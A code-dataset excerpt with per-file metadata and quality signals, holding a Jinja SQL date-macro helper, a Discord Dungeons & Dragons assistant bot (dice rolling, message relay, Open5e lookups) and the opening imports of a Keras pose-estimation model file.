hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
bf763a4c8d592b78137aeb2e05f05552f4b74818 | 2,415 | py | Python | squealy/jinjasql_loader.py | zeeshankhan28/squealy | 5dfe9c5830ef74978f5defc872500fb710097408 | [
"MIT"
] | null | null | null | squealy/jinjasql_loader.py | zeeshankhan28/squealy | 5dfe9c5830ef74978f5defc872500fb710097408 | [
"MIT"
] | null | null | null | squealy/jinjasql_loader.py | zeeshankhan28/squealy | 5dfe9c5830ef74978f5defc872500fb710097408 | [
"MIT"
] | 1 | 2022-03-20T18:24:50.000Z | 2022-03-20T18:24:50.000Z | import datetime
from jinja2 import DictLoader
from jinja2 import Environment
from jinjasql import JinjaSql
from dateutil.relativedelta import relativedelta
from dateutil import rrule
from squealy.exceptions import InvalidDateRangeException
def configure_jinjasql():
    """Build and return a JinjaSql instance whose environment exposes the
    date helper macros (``date_range`` and ``date_diff``) under the
    template name ``utils.sql``.
    """
    utils = """
    {% macro date_range(day, range) -%}
    {{day |safe}} between {{calculate_start_date(range)}} and {{get_today()}}
    {%- endmacro %}
    {% macro date_diff(start_date, end_date, parameter) -%}
    {{ get_date_diff(start_date, end_date, parameter) }}
    {%- endmacro %}
    """
    env = Environment(loader=DictLoader({"utils.sql": utils}))
    # Make the Python date helpers callable from inside the templates.
    env.globals.update(
        get_date_diff=get_date_diff,
        calculate_start_date=calculate_start_date,
        get_today=get_today,
    )
    return JinjaSql(env)
def get_date_diff(start_date, end_date, parameter):
    """
    Return the number of day/week/month/year recurrence occurrences
    between two 'YYYY-MM-DD' date strings (both endpoints included,
    per dateutil rrule semantics — unchanged from the original).

    :param start_date: inclusive start, formatted '%Y-%m-%d'
    :param end_date:   inclusive end, formatted '%Y-%m-%d'
    :param parameter:  one of 'days', 'weeks', 'months', 'years'
    :raises KeyError:  for any other parameter value (same as before)
    :raises ValueError: if a date string does not match the format
    """
    start_date = datetime.datetime.strptime(start_date, '%Y-%m-%d')
    end_date = datetime.datetime.strptime(end_date, '%Y-%m-%d')
    # Map each supported granularity to its rrule frequency.  Only the
    # requested recurrence is generated; the original eagerly built all
    # four occurrence lists just to index one of them.
    freq_map = {
        'days': rrule.DAILY,
        'months': rrule.MONTHLY,
        'years': rrule.YEARLY,
        'weeks': rrule.WEEKLY,
    }
    return len(list(rrule.rrule(freq_map[parameter], dtstart=start_date, until=end_date)))
def calculate_start_date(range):
    """
    Jinja helper: map a named range ('last_3_days', 'last_week',
    'last_month', 'last_quarter', 'last_half', 'last_year') to its
    start date relative to today.

    :raises InvalidDateRangeException: for any unrecognised range name
    """
    offsets = {
        "last_3_days": relativedelta(days=-2),
        "last_week": relativedelta(days=-6),
        "last_month": relativedelta(months=-1),
        "last_quarter": relativedelta(months=-2),
        "last_half": relativedelta(months=-5),
        "last_year": relativedelta(years=-1),
    }
    if range not in offsets:
        raise InvalidDateRangeException("Invalid value for date_range macro in SQL query.")
    return datetime.date.today() + offsets[range]
def get_today():
    """Return the current local date (exposed to templates as a Jinja global)."""
    today = datetime.date.today()
    return today
| 34.014085 | 92 | 0.677433 | 301 | 2,415 | 5.242525 | 0.292359 | 0.108365 | 0.045627 | 0.043093 | 0.193283 | 0.137516 | 0.06654 | 0.045627 | 0 | 0 | 0 | 0.004651 | 0.198758 | 2,415 | 70 | 93 | 34.5 | 0.810853 | 0.086128 | 0 | 0.041667 | 0 | 0 | 0.236465 | 0.035632 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.145833 | 0.020833 | 0.3125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf78dd1874f5270c579ee607ac544063c7bfd4b9 | 21,782 | py | Python | assistant/bot.py | jdcarpinelli/dungeons | fb644ba30e2bbd04d019ac279e27fdedfa1b0110 | [
"MIT"
] | 1 | 2021-02-11T02:50:11.000Z | 2021-02-11T02:50:11.000Z | assistant/bot.py | jdcarpinelli/dungeons | fb644ba30e2bbd04d019ac279e27fdedfa1b0110 | [
"MIT"
] | 1 | 2020-06-18T04:13:53.000Z | 2020-06-20T17:34:59.000Z | assistant/bot.py | jdcarpinelli/dungeons | fb644ba30e2bbd04d019ac279e27fdedfa1b0110 | [
"MIT"
] | null | null | null | ## Dungeons and Dragons Assistant
# Discord bot to handle...
# dice rolling,
# relaying messages,
# roll tracking,
# and (maybe) eventually more!
#
# Copied and modified code from:
# https://realpython.com/how-to-make-a-discord-bot-python/
#
##
# Imports
import sys, os, time, random, datetime
import discord
from discord.ext import commands
from dotenv import load_dotenv
import dice
# Imports from shadowedlucario/oghma:46128dc:bot.py
from query import *
import requests
import json
# Load token, server name from local file
# (expects a .env file supplying DISCORD_TOKEN, DISCORD_GUILD,
#  TOP_LEVEL_PATH and AUTHOR).
load_dotenv()
TOKEN = os.getenv('DISCORD_TOKEN')  # bot authentication token
GUILD = os.getenv('DISCORD_GUILD')  # name of the guild (server) to serve
TOP_LEVEL_PATH = os.getenv('TOP_LEVEL_PATH')  # repo root; used to build log file paths
AUTHOR = os.getenv('AUTHOR')  # maintainer handle interpolated into user-facing messages
# Bot invalid command messages
INVALID_ROLL_CMD = \
    'Whoops! The roll command wasn\'t used correctly.\n' \
    'Try using the same format as the examples in "!help roll".'
INVALID_TELL_CMD = \
    'Whoops! The tell command wasn\'t used correctly.\n' \
    'Try using the same format as the examples in "!help tell".'
INVALID_TELL_MSG = \
    'This command requires a non-blank message.'
INVALID_TELL_RECIPIENT = \
    'The user you requested was not found in the server.'
# Generic apology shown (and echoed to the console) whenever a command
# handler raises; see on_command_error below.
INTERNAL_BUG = \
    f'Congrats! That command you just sent resulted in an internal bug! ' \
    f'Sorry about that, this was {AUTHOR}\'s first attempt at a Bot. ' \
    f'Sending {AUTHOR} a DM with the command you sent would be really helpful!'
## Helper functions
# Returns a timestamp string for building unique log filenames.
def get_timestamp():
    """Current time as a digit string (time.time() scaled by 10e3,
    i.e. units of 100 microseconds)."""
    ticks = int(time.time() * 10e3)
    return str(ticks)
# Create bot
# '!' is the command prefix; disable_everyone prevents the bot from
# triggering @everyone pings when echoing user-supplied text.
bot = commands.Bot(command_prefix='!', disable_everyone=False)
# On startup
@bot.event
async def on_ready():
    """Log connection details once the bot is connected to the target guild."""
    guild = discord.utils.get(bot.guilds, name=GUILD)
    if guild is None:
        # Target guild not found among the bot's guilds; stay silent,
        # matching the original behavior.
        return
    print('Connection with guild established!')
    print(f'Bot username: {bot.user}')
    print(f'Guild name: {guild.name}')
# On event error
@bot.event
async def on_error(event, *args, **kwargs):
    """Log unhandled 'on_message' events to a fresh error-log file;
    re-raise any other event's exception unchanged."""
    log_path = (TOP_LEVEL_PATH + '/assistant/logs/errors/err'
                + get_timestamp() + '.log')
    with open(log_path, 'a') as f:
        if event == 'on_message':
            f.write(f'Unhandled message: {args[0]}\n')
        else:
            # Bare raise re-raises the exception currently being handled
            # (presumably discord.py invokes this handler inside that
            # context — TODO confirm).
            raise
# On command error
@bot.event
async def on_command_error(ctx, error):
    """Echo the internal-bug notice to the console, write full details
    (author, message metadata, error) to a unique log file, then apologise
    to the user in-channel."""
    print('\n\n' + INTERNAL_BUG + '\n\n')

    log_path = (TOP_LEVEL_PATH + '/assistant/logs/command_errors/err'
                + get_timestamp() + '.log')
    with open(log_path, 'a') as err_file:
        err_file.write(
            f'Author: {ctx.author}\n\n'
            f'Message Metadata: {ctx.message}\n\n'
            f'Error: {str(error)}'
        )
        print('Error logged to ', err_file.name)

    await ctx.send(INTERNAL_BUG)
# Print intro message
@bot.command(
    name='intro',
    help='Responds with Dnd-Assistant Introduction.'
)
async def intro(ctx, *args):
    """Send a single embed introducing the bot and summarising its three
    commands (roll, help, intro).  Any arguments are accepted and ignored."""
    # Ignore any arguments
    embed = discord.Embed(
        title='Hello, meet DnD-Assistant!',
        description= \
            f'The primary feature is rolling dice, '
            f'but more features will be added soon. '
            f'Let {AUTHOR} know if you have any '
            f'features you want added!\n\n'
            f'You can run DnD-Assistant\'s commands '
            f'by typing "!" immediately followed by '
            f'the command. For example, to list all '
            f'possible commands, enter "!help". To '
            f'get help with a particular command, like '
            f'the "roll" command, enter "!help roll". '
            f'Finally, to roll three 6-sided die, enter '
            f'"!roll 3d6".\n\n'
            f'If you\'re interested, you can check out '
            f'the source code at https://github.com/cadojo/dungeons.',
        color=0x000000)
    # Roll command
    embed.add_field(
        name='Command: roll',
        value= \
            'Rolls 4, 6, 8, 10, 12, or 20 sided die.\n'
            'Usage: !roll 20, !roll 3d6, !r 2d20, etc.',
        inline=False
    )
    # Help command
    embed.add_field(
        name='Command: help',
        value= \
            'List all possible DnD-Assistant commands, or '
            'get help with one specific command.\n'
            'Usage: !help, or !help roll, !help r, !help intro, etc.',
        inline=False
    )
    # Intro command
    embed.add_field(
        name='Command: intro',
        value= \
            'Print out this introduction!\n'
            'Usage: !intro',
        inline=False
    )
    await ctx.send(embed=embed)
# Roll dice
@bot.command(
    name='roll',
    aliases=['r'],
    help='Rolls 4, 6, 8, 10, 12, or 20 sided die.\n\n'
         'Examples:\n'
         'Roll a single 20-sided die:\t\t!roll 20\n'
         'Roll three 6-sided die:\t\t\t!roll 3d6\n'
         '"!r" serves as a shortcut for "!roll:\t!r 20\n')
async def roll(ctx, *args):
    """Delegate parsing/rolling to dice.roll_request and report either the
    result or the usage help."""
    success, outcome = dice.roll_request(args)
    if not success:
        await ctx.send(INVALID_ROLL_CMD + '\n' + str(outcome))
        return
    await ctx.send('Roll returned: ' + str(outcome))
# Relay a message
@bot.command(
    name = 'tell',
    help = \
        f'Relay a message to someone else on this server.\n\n'
        f'Examples:\n'
        f'Tell {AUTHOR} have a great day: !tell @jodoca have a great day!'
)
async def tell(ctx, recipient: str, *message):
    """Relay *message* to another user (or @everyone) on the guild.

    Usage: !tell @user message without any quotes

    When invoked from a DM, the message is delivered as a DM to each
    recipient; otherwise the relay is posted in the invoking channel.
    """
    guild = discord.utils.get(bot.guilds, name=GUILD)
    if guild is None:
        await ctx.send(INTERNAL_BUG)
        return

    # Re-construct the free-form message from its space-split parts
    # (each word gets a trailing space, as before).
    msg = ''.join(m + ' ' for m in message)

    # The recipient must be a mention and the message must be non-empty.
    if '@' not in recipient \
        or recipient == '' \
        or msg == '':
        await ctx.send(INVALID_TELL_CMD + '\n' + INVALID_TELL_MSG)
        # BUG FIX: the original fell through here and kept processing the
        # invalid command (potentially sending an empty relay); bail out.
        return

    # Resolve the recipient(s): @everyone, or one user matched by name/id.
    all_recipients = []
    if recipient == '@everyone':
        all_recipients = [user for user in guild.members if user != bot.user]
    else:
        # Strip the mention decoration, leaving the raw id or name.
        recipient_parsed = recipient\
            .replace('@','')\
            .replace('<','')\
            .replace('>','')\
            .replace('!','')
        for user in [user for user in guild.members if user != bot.user]:
            if (recipient_parsed == user.name) \
                or (recipient_parsed == str(user.id)):
                all_recipients.append(user)

    if len(all_recipients) == 0:
        await ctx.send(INVALID_TELL_RECIPIENT)
        return

    # In a DM, relay privately; otherwise reply where the command was posted.
    if ctx.message.channel.type == discord.ChannelType.private:
        for user in all_recipients:
            await user.send('<@!' + str(ctx.author.id) + '> says: ' + msg)
        await ctx.send('Sent!')
        return
    else:
        recipient_str = ''
        for user in all_recipients:
            recipient_str += ('<@!' + str(user.id) + '> ')
        await ctx.send(
            f'Hey {recipient_str}, {ctx.author.name} says: {msg}'
        )
        return
### Bot commands from shadowedlucario/oghma
###
# FUNC NAME: ?search [ENTITY]
# FUNC DESC: Queries the Open5e search API, basically searches the whole thing for the ENTITY.
# ENTITY: The DND entity you wish to get infomation on.
# FUNC TYPE: Command
###
@bot.command(
    name='search',
    help='Queries the Open5e API to get the entities infomation.',
    usage='?search [ENTITY]',
    aliases=["sea", "s", "S"]
)
async def search(ctx, *args):
    """Search the whole Open5e /search endpoint for a D&D entity.

    With no arguments, dumps every searchable entity name to a .txt file
    and uploads it.  Otherwise looks up the best (possibly partial) match
    and replies with the embeds / files built by constructResponse().
    """
    print(f"Executing: ?search {args}")

    # partialMatch is a module-level flag set by requestOpen5e(); reset it
    # so state from a previous invocation does not leak into this one.
    global partialMatch
    partialMatch = False

    # Guard against queries too large for Discord embeds.
    if len(args) >= 201:
        argumentsEmbed = discord.Embed(
            color=discord.Colour.red(),
            title="Invalid argument length",
            description="This command does not support more than 200 words in a single message. Try splitting up your query."
        )
        argumentsEmbed.set_thumbnail(url="https://i.imgur.com/j3OoT8F.png")
        return await ctx.send(embed=argumentsEmbed)

    # No search term given: send the full directory listing as a file.
    if len(args) <= 0:
        await ctx.send(embed=discord.Embed(
            color=discord.Colour.blue(),
            title="Searching...",
            description="This might take a few seconds!"
        ))

        # Pull every object in the search endpoint.
        directoryRequest = requests.get("https://api.open5e.com/search/?format=json&limit=10000")
        if directoryRequest.status_code != 200:
            return await ctx.send(embed=codeError(
                directoryRequest.status_code,
                "https://api.open5e.com/search/?format=json&limit=10000"
            ))

        # Generate a unique filename and write every entity name to it.
        # FIX: use a context manager so the handle is closed even if a
        # write raises (was an unguarded open()/close() pair).
        entityFileName = generateFileName("entsearch")
        with open(entityFileName, "a+") as entityFile:
            for entity in directoryRequest.json()["results"]:
                if "title" in entity.keys():
                    entityFile.write(f"{ entity['title'] }\n")
                else:
                    entityFile.write(f"{ entity['name'] }\n")

        # Warn that the results arrive as a file, then send it.
        detailsEmbed = discord.Embed(
            colour=discord.Colour.orange(),
            title=f"See `{ entityFileName }` for all searchable entities in this endpoint",
            description="Due to discord charecter limits regarding embeds, the results have to be sent in a file. Yes I know this is far from ideal but it's the best I can do!"
        )
        detailsEmbed.set_thumbnail(url="https://i.imgur.com/obEXyeX.png")
        await ctx.send(embed=detailsEmbed)

        return await ctx.send(file=discord.File(entityFileName))

    # Filter input to remove whitespaces and set lowercase.
    filteredInput = "".join(args).lower()

    # Tell the user the search has started.
    await ctx.send(embed=discord.Embed(
        color=discord.Colour.blue(),
        title=f"Searching for { filteredInput }...",
        description="This might take a few seconds!"
    ))

    # Use first word to narrow search results down for quicker response on some directories.
    match = requestOpen5e(f"https://api.open5e.com/search/?format=json&limit=10000&text={ str(args[0]) }", filteredInput, True)

    # An API request inside requestOpen5e() failed.
    if isinstance(match, dict) and "code" in match.keys():
        return await ctx.send(embed=codeError(match["code"], match["query"]))

    # Searching algorithm hit an invalid object.
    elif match == "UNKNOWN":
        unknownMatchEmbed = discord.Embed(
            colour=discord.Colour.red(),
            title="ERROR",
            description="I found an entity in the API database that doesn't contain a `name` or `docuement` attribute. Please report this to https://github.com/shadowedlucario/oghma/issues"
        )
        unknownMatchEmbed.set_thumbnail(url="https://i.imgur.com/j3OoT8F.png")
        return await ctx.send(embed=unknownMatchEmbed)

    # No entity was found.  (idiom fix: `is None` instead of `== None`)
    elif match is None:
        noMatchEmbed = discord.Embed(
            colour=discord.Colour.orange(),
            title="ERROR",
            description=f"No matches found for **{ filteredInput }** in the search endpoint"
        )
        noMatchEmbed.set_thumbnail(url="https://i.imgur.com/obEXyeX.png")
        return await ctx.send(embed=noMatchEmbed)

    # Otherwise, construct & send responses.
    else:
        responses = constructResponse(args, match["route"], match["matchedObj"])
        for response in responses:
            if isinstance(response, discord.Embed):
                # Set a thumbnail for relevent embeds on a successful
                # Scryfall request, overwriting all other thumbnail setup.
                image = requestScryfall(args, False)
                if (not isinstance(image, int)): response.set_thumbnail(url=image)

                # Note partial match in footer of embed.
                if partialMatch:
                    response.set_footer(text=f"NOTE: Your search term ({ filteredInput }) was a PARTIAL match to this entity.\nIf this isn't the entity you were expecting, try refining your search term or use ?searchdir instead")
                else:
                    response.set_footer(text="NOTE: If this isn't the entity you were expecting, try refining your search term or use `?searchdir` instead")

                print(f"SENDING EMBED: { response.title }...")
                await ctx.send(embed=response)

            elif ".txt" in response:
                print(f"SENDING FILE: { response }...")
                await ctx.send(file=discord.File(response))
###
# FUNC NAME: ?searchdir [RESOURCE] [ENTITY]
# FUNC DESC: Queries the Open5e RESOURCE API.
# RESOURCE: Resource name (i.e. spells, monsters, etc.).
# ENTITY: The DND entity you wish to get infomation on.
# FUNC TYPE: Command
###
@bot.command(
    name='searchdir',
    help='Queries the Open5e API to get the entities infomation from the specified resource.',
    usage='!search [RESOURCE] [ENTITY]',
    aliases=["dir", "d", "D"]
)
async def searchdir(ctx, *args):
    """Search one specific Open5e resource directory for a D&D entity.

    args[0] selects the directory (spells, monsters, ...); the remaining
    words form the search term.  With only a directory given, every entity
    name in that directory is listed (inline, or in a .txt file when long).
    """
    print(f"EXECUTING: ?searchdir {args}")

    # partialMatch is a module-level flag set by requestOpen5e(); reset it.
    global partialMatch
    partialMatch = False

    # Get the API root to discover the available directories.
    rootRequest = requests.get("https://api.open5e.com?format=json")
    if rootRequest.status_code != 200:
        return await ctx.send(embed=codeError(rootRequest.status_code, "https://api.open5e.com?format=json"))

    # Remove search endpoint from list (not used in this command).
    directories = list(rootRequest.json().keys())
    directories.remove("search")

    # Verify we have arguments.
    if len(args) <= 0:
        usageEmbed = discord.Embed(
            colour=discord.Colour.red(),
            title="No directory was requested.\nUSAGE: `?searchdir [DIRECTORY] [D&D OBJECT]`",
            description=f"**Available Directories**\n{ ', '.join(directories) }"
        )
        usageEmbed.set_thumbnail(url="https://i.imgur.com/obEXyeX.png")
        return await ctx.send(embed=usageEmbed)

    # Directory name, normalised with a trailing slash for URL building.
    filteredDictionary = f"{ args[0].lower() }/"

    # Filter input to remove whitespaces and set lowercase.
    filteredInput = "".join(args[1:]).lower()

    # Guard against queries too large for Discord embeds.
    if len(args) >= 201:
        argumentsEmbed = discord.Embed(
            color=discord.Colour.red(),
            title="Invalid argument length",
            description="This command does not support more than 200 words in a single message. Try splitting up your query."
        )
        argumentsEmbed.set_thumbnail(url="https://i.imgur.com/j3OoT8F.png")
        return await ctx.send(embed=argumentsEmbed)

    # Verify the requested resource exists.
    if directories.count(args[0]) <= 0:
        noResourceEmbed = discord.Embed(
            colour=discord.Colour.orange(),
            title=f"Requested Directory (`{ str(args[0]) }`) is not a valid directory name",
            description=f"**Available Directories**\n{ ', '.join(directories) }"
        )
        noResourceEmbed.set_thumbnail(url="https://i.imgur.com/obEXyeX.png")
        return await ctx.send(embed=noResourceEmbed)

    # Directory given but no search term: dump the directory contents.
    if len(args) == 1:
        await ctx.send(embed=discord.Embed(
            color=discord.Colour.blue(),
            title=f"Searching for everything having to do this { filteredDictionary.upper() }!!",
            description="Sit back, this might take a minute."
        ))

        directoryRequest = requests.get(f"https://api.open5e.com/{ filteredDictionary }?format=json&limit=10000")
        if directoryRequest.status_code != 200:
            return await ctx.send(embed=codeError(
                directoryRequest.status_code,
                f"https://api.open5e.com/{ filteredDictionary }?format=json&limit=10000"
            ))

        entityNames = []
        for entity in directoryRequest.json()["results"]:
            if "title" in entity.keys(): entityNames.append(entity['title'])
            else: entityNames.append(entity['name'])

        # Small listings fit in a single embed (keep description word
        # count low to account for names with lots of charecters).
        if len(entityNames) <= 200:
            detailsEmbed = discord.Embed(
                colour=discord.Colour.orange(),
                title="All searchable entities in this endpoint",
                description="\n".join(entityNames)
            )
            detailsEmbed.set_thumbnail(url="https://i.imgur.com/obEXyeX.png")
            if "search" in filteredDictionary:
                detailsEmbed.set_footer(text="NOTE: The `search` endpoint is not searchable with `?searchdir`. Use `?search` instead for this.")
            return await ctx.send(embed=detailsEmbed)

        # Longer listings go to a uniquely named file.
        # FIX: use a context manager so the handle is closed even if the
        # write raises (was an unguarded open()/close() pair).
        entityDirFileName = generateFileName("entsearchdir")
        with open(entityDirFileName, "a+") as entityFile:
            entityFile.write("\n".join(entityNames))

        # Send embed notifying start of the spam stream.
        detailsEmbed = discord.Embed(
            colour=discord.Colour.orange(),
            title=f"See `{ entityDirFileName }` for all searchable entities in this endpoint",
            description="Due to discord charecter limits regarding embeds, the results have to be sent in a file. Yes I know this is far from ideal but it's the best I can do!"
        )
        detailsEmbed.set_thumbnail(url="https://i.imgur.com/obEXyeX.png")
        if "search" in filteredDictionary:
            detailsEmbed.set_footer(text="NOTE: The `search` endpoint is not searchable with `?searchdir`. Use `?search` instead for this.")
        await ctx.send(embed=detailsEmbed)

        return await ctx.send(file=discord.File(entityDirFileName))

    # search/ endpoint is best used with the dedicated ?search command.
    if "search" in filteredDictionary:
        # Remove search endpoint from list.
        directories = list(rootRequest.json().keys())
        directories.remove("search")

        searchEmbed = discord.Embed(
            colour=discord.Colour.orange(),
            title=f"Requested Directory (`{ str(args[0]) }`) is not a valid directory name",
            description=f"**Available Directories**\n{ ', '.join(directories) }"
        )
        searchEmbed.add_field(name="NOTE", value="Use `?search` for searching the `search/` directory. This has been done to cut down on parsing errors.")
        searchEmbed.set_thumbnail(url="https://i.imgur.com/obEXyeX.png")
        return await ctx.send(embed=searchEmbed)

    # Tell the user the search has started.
    await ctx.send(embed=discord.Embed(
        color=discord.Colour.blue(),
        title=f"Searching all { filteredDictionary.upper() } for { filteredInput }...",
        description="This might take a few seconds!"
    ))

    # Determine filter type (search can only be used for some endpoints).
    filterType = "text"
    if args[0] in searchParamEndpoints: filterType = "search"

    # Use first word to narrow search results down for quicker response on some directories.
    match = requestOpen5e(
        f"https://api.open5e.com/{ filteredDictionary }?format=json&limit=10000&{ filterType }={ str(args[1]) }",
        filteredInput,
        False
    )

    # An API request failed.
    # BUG FIX: `match` is a dict here, so the original attribute access
    # (match.code / match.query) raised AttributeError at runtime; use
    # subscripting, exactly as the sibling `search` command does.
    if isinstance(match, dict) and "code" in match.keys():
        return await ctx.send(embed=codeError(match["code"], match["query"]))

    # Searching algorithm hit an invalid object.
    elif match == "UNKNOWN":
        unknownMatchEmbed = discord.Embed(
            colour=discord.Colour.red(),
            title="ERROR",
            description="I found an entity in the API database that doesn't contain a `name` or `docuement` attribute. Please report this to https://github.com/shadowedlucario/oghma/issues"
        )
        unknownMatchEmbed.set_thumbnail(url="https://i.imgur.com/j3OoT8F.png")
        return await ctx.send(embed=unknownMatchEmbed)

    # No entity was found.  (idiom fix: `is None` instead of `== None`)
    elif match is None:
        noMatchEmbed = discord.Embed(
            colour=discord.Colour.orange(),
            title="ERROR",
            description=f"No matches found for **{ filteredInput.upper() }** in the { filteredDictionary } endpoint"
        )
        noMatchEmbed.set_thumbnail(url="https://i.imgur.com/obEXyeX.png")
        return await ctx.send(embed=noMatchEmbed)

    # Otherwise, construct & send responses.
    else:
        responses = constructResponse(args, filteredDictionary, match)
        for response in responses:
            if isinstance(response, discord.Embed):
                # Set a thumbnail for relevent embeds on a successful
                # Scryfall request, overwriting other thumbnail setup.
                image = requestScryfall(args, True)
                if (not isinstance(image, int)): response.set_thumbnail(url=image)

                # Note partial match in footer of embed.
                if partialMatch:
                    response.set_footer(text=f"NOTE: Your search term ({ filteredInput }) was a PARTIAL match to this entity.\nIf this isn't the entity you were expecting, try refining your search term")

                print(f"SENDING EMBED: { response.title }...")
                await ctx.send(embed=response)

            elif ".txt" in response:
                print(f"SENDING FILE: { response }...")
                await ctx.send(file=discord.File(response))
# Entry point: connect to Discord using the token loaded from the environment.
if __name__ == '__main__':
    bot.run(TOKEN)
| 35.533442 | 229 | 0.622441 | 2,679 | 21,782 | 5.025009 | 0.178798 | 0.021394 | 0.03209 | 0.030308 | 0.608825 | 0.584683 | 0.557941 | 0.536547 | 0.5104 | 0.492869 | 0 | 0.008871 | 0.265081 | 21,782 | 612 | 230 | 35.591503 | 0.832084 | 0.145533 | 0 | 0.405063 | 0 | 0.01519 | 0.334144 | 0.011353 | 0 | 0 | 0.000432 | 0 | 0 | 1 | 0.002532 | false | 0 | 0.020253 | 0.002532 | 0.078481 | 0.027848 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf78e11629d9199d5d649ba8cfe17400cd17fd79 | 3,217 | py | Python | Custom_Functions/Model_Generator.py | knownstranger03/Human_Pose_Estimation | fad4b171ffc6514918990b5f48e439ca7f5b3184 | [
"MIT"
] | null | null | null | Custom_Functions/Model_Generator.py | knownstranger03/Human_Pose_Estimation | fad4b171ffc6514918990b5f48e439ca7f5b3184 | [
"MIT"
] | null | null | null | Custom_Functions/Model_Generator.py | knownstranger03/Human_Pose_Estimation | fad4b171ffc6514918990b5f48e439ca7f5b3184 | [
"MIT"
] | null | null | null | import keras
import tensorflow
from keras.applications.vgg16 import VGG16
from keras.engine.sequential import Sequential
from keras.layers import Flatten, Dense, Dropout, BatchNormalization, InputLayer, Conv2D, MaxPool2D, Activation, Concatenate,add
from keras.models import Model
import warnings
